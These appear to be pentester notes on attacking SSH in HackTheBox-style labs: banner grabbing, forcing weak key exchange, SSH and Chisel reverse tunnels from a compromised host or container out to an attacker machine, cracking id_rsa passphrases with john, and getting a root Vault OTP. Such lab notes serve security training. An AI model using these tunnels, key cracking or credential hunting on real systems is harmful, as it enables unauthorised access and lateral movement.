# 22 - SSH

### Banner Grabbing

```bash
$ nc -vn <IP> 22
```
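The line `nc` prints is the RFC 4253 identification string, `SSH-<protoversion>-<softwareversion>[ <comments>]`, and the server sends it without waiting for any client input. As an added example (not part of the original notes), the script below grabs that line over a plain socket and splits it into fields; the sample banners are constructed for offline testing, not captured from any host on this page.

```python
import socket
from typing import Optional

# Constructed sample banners for offline testing (not captured from any real host).
SAMPLE_BANNERS = [
    b"SSH-2.0-OpenSSH_4.3\r\n",
    b"SSH-1.99-OpenSSH_3.9p1 Debian-1ubuntu2\r\n",
    # RFC 4253 4.2 allows a server to send text lines before the identification string.
    b"Welcome to the jungle\r\nSSH-2.0-dropbear_2019.78\r\n",
]


def grab_banner(host: str, port: int = 22, timeout: float = 5.0) -> bytes:
    """Connect and read the server identification line (the server speaks first)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(1024)


def parse_banner(raw: bytes) -> Optional[dict]:
    """Split 'SSH-<proto>-<software>[ <comments>]' into its parts.

    Lines that do not start with 'SSH-' are pre-banner text and are skipped.
    Returns None if no identification line is present.
    """
    for line in raw.splitlines():
        if not line.startswith(b"SSH-"):
            continue
        ident, _, comments = line.partition(b" ")
        parts = ident.split(b"-", 2)          # [b'SSH', proto, software]
        if len(parts) != 3:
            return None
        proto = parts[1].decode("ascii", "replace")
        return {
            "protocol": proto,
            "software": parts[2].decode("ascii", "replace"),
            "comments": comments.decode("ascii", "replace"),
            # '1.99' means the server also accepts SSH-1 clients (worth a line in a
            # report); anything starting with '1.' speaks protocol 1 in some form.
            "ssh1_compatible": proto.startswith("1."),
        }
    return None


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    raw = grab_banner(target) if target else SAMPLE_BANNERS[1]
    print(raw)
    print(parse_banner(raw))
```

Run it as `python3 banner.py <IP>` to hit a live host, or with no argument to parse the built-in sample. The `comments` field often carries the distribution package string (`Debian-10+deb9u7` and the like), which pins the exact patch level more precisely than the bare OpenSSH version.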

### Generate SSH Key

```bash
$ ssh-keygen -t rsa -b 4096 -f matt-id_rsa
```

### No Matching Key Exchange

```bash
$ ssh root@beep.htb
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
$ ssh -oKexAlgorithms=+diffie-hellman-group-exchange-sha1 root@beep.htb
```
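The same `Unable to negotiate ... no matching <thing> found. Their offer: ...` message is printed by OpenSSH for key exchange methods, host key types, ciphers and MACs, and each maps to its own `ssh_config` option (`KexAlgorithms`, `HostKeyAlgorithms`, `Ciphers`, `MACs`). As an added example that generalizes the one-liner above (not part of the original notes), the script below parses that stderr line, picks the least-weak algorithm the server offers, and emits the matching `-o<Option>=+<alg>` flags; the `+` prefix appends to the client defaults rather than replacing them. The host-key error string is a constructed sample in the same format as the page's real one.

```python
import re
from typing import List

# Verbatim error line from the notes above, plus a constructed host-key variant.
KEX_ERROR = (
    "Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method "
    "found. Their offer: diffie-hellman-group-exchange-sha1,"
    "diffie-hellman-group14-sha1,diffie-hellman-group1-sha1"
)
HOSTKEY_ERROR = (  # constructed example, same message format
    "Unable to negotiate with 10.0.0.5 port 22: no matching host key type found. "
    "Their offer: ssh-rsa,ssh-dss"
)

# OpenSSH prints "no matching <what> found. Their offer: a,b,c"; map <what> to the
# ssh_config option that controls that algorithm list.
_OPTION_FOR = {
    "key exchange method": "KexAlgorithms",
    "host key type": "HostKeyAlgorithms",
    "cipher": "Ciphers",
    "MAC": "MACs",
}
_ERR_RE = re.compile(r"no matching (?P<what>[A-Za-z ]+?) found\. Their offer: (?P<offer>\S+)")

# Rough weakness penalties (assumed ranking, lower is better); ties keep server order.
_PENALTIES = {"group1-": 2, "ssh-dss": 2, "md5": 2, "arcfour": 2,
              "sha1": 1, "cbc": 1, "ssh-rsa": 1}


def weakness(alg: str) -> int:
    return sum(p for needle, p in _PENALTIES.items() if needle in alg)


def pick_algorithm(offered: List[str]) -> str:
    """Least-weak offered algorithm; min() returns the first one on ties."""
    return min(offered, key=weakness)


def options_from_error(stderr: str) -> List[str]:
    """Turn ssh's negotiation error(s) into '-o<Option>=+<alg>' flags."""
    flags = []
    for m in _ERR_RE.finditer(stderr):
        option = _OPTION_FOR.get(m.group("what"))
        if option is None:      # e.g. "compression method": no list to extend
            continue
        flags.append(f"-o{option}=+{pick_algorithm(m.group('offer').split(','))}")
    return flags


def build_ssh_argv(target: str, stderr: str) -> List[str]:
    return ["ssh", *options_from_error(stderr), target]


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "root@beep.htb"
    print(" ".join(build_ssh_argv(target, sys.stdin.read())))
```

Typical use is `ssh -n root@beep.htb 2>&1 | python3 sshneg.py root@beep.htb`, then run the printed command. If the client refuses the option anyway, check `ssh -Q kex` and `ssh -Q key` on your side: recent OpenSSH releases drop some legacy algorithms at compile time, in which case an older client (or a container with one) is needed rather than another `-o` flag.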

### SSH Tunneling

```bash
# Remote (reverse) tunnel started on the victim: exposes the victim's local port 5432
# (postgresql) on the attacker box (10.10.14.10) as localhost:5432.
# -N: no remote command, -f: go to background once the tunnel is up.
ssh -N -f -R 5432:localhost:5432 p3@10.10.14.10

# Local tunnel started on the attacker: attacker's localhost:8002 is forwarded to
# port 8002 on the victim's loopback (reaches services bound to 127.0.0.1 only).
ssh -N -f -L 8002:localhost:8002 hflaccus@carpediem.htb
ssh -N -f -L 3306:localhost:3306 charlie@extension.htb -i id_rsa

# Using Chisel to enumerate local web services on a remote host
# Chisel server (attacker host)
$ ./chisel_1.7.7_linux_amd64 server -p 4444 -reverse

# Chisel client (victim host): attacker's port 8080 -> victim's 127.0.0.1:8080
$ ./chisel_1.7.7_linux_amd64 client 10.10.14.5:4444 R:8080:127.0.0.1:8080

# Using Chisel to set up a tunnel from a compromised docker container to proxy
# traffic toward the docker host (172.17.0.1:3000).
# Chisel server (attacker host)
$ ./chisel_1.7.7_linux_amd64 server -p 3333 -reverse

# Chisel client (victim docker container): attacker's 127.0.0.1:3000 -> docker host 172.17.0.1:3000
$ ./chisel_1.7.7_linux_amd64 client 10.10.15.17:3333 R:127.0.0.1:3000:172.17.0.1:3000
```

### Brute Force id\_rsa

```bash
# Convert the private key (id_rsa, PEM) into a john hash with ssh2john, then crack the
# passphrase with john and a wordlist.
$ ssh2john.py id_rsa > id_rsa.hash
$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
```

### Vault SSH OTP

Vault can be used to issue one-time passwords (OTP) for SSH logins. To request an OTP you need to know the *role* path (for example `ssh/creds/otp_key_role`; in the box below it was `ssh/creds/root_otp`) and the target IP; here the role name was found in **secrets.sh**. The returned `key` is the one-time password to enter at the SSH password prompt for `username`@`ip`.

```bash
$ vault write ssh/creds/root_otp ip=10.10.10.110
Key                Value
---                -----
lease_id           ssh/creds/root_otp/bdbe45d6-24b0-6a02-8534-d37bbb3f54c5
lease_duration     768h
lease_renewable    false
ip                 10.10.10.110
key                1762e6a1-f975-61f8-814e-f7d65a2a1f51
key_type           otp
port               22
username           root
```

### Interesting Files

```bash
ssh_config
sshd_config
authorized_keys
ssh_known_hosts
known_hosts
id_rsa
```

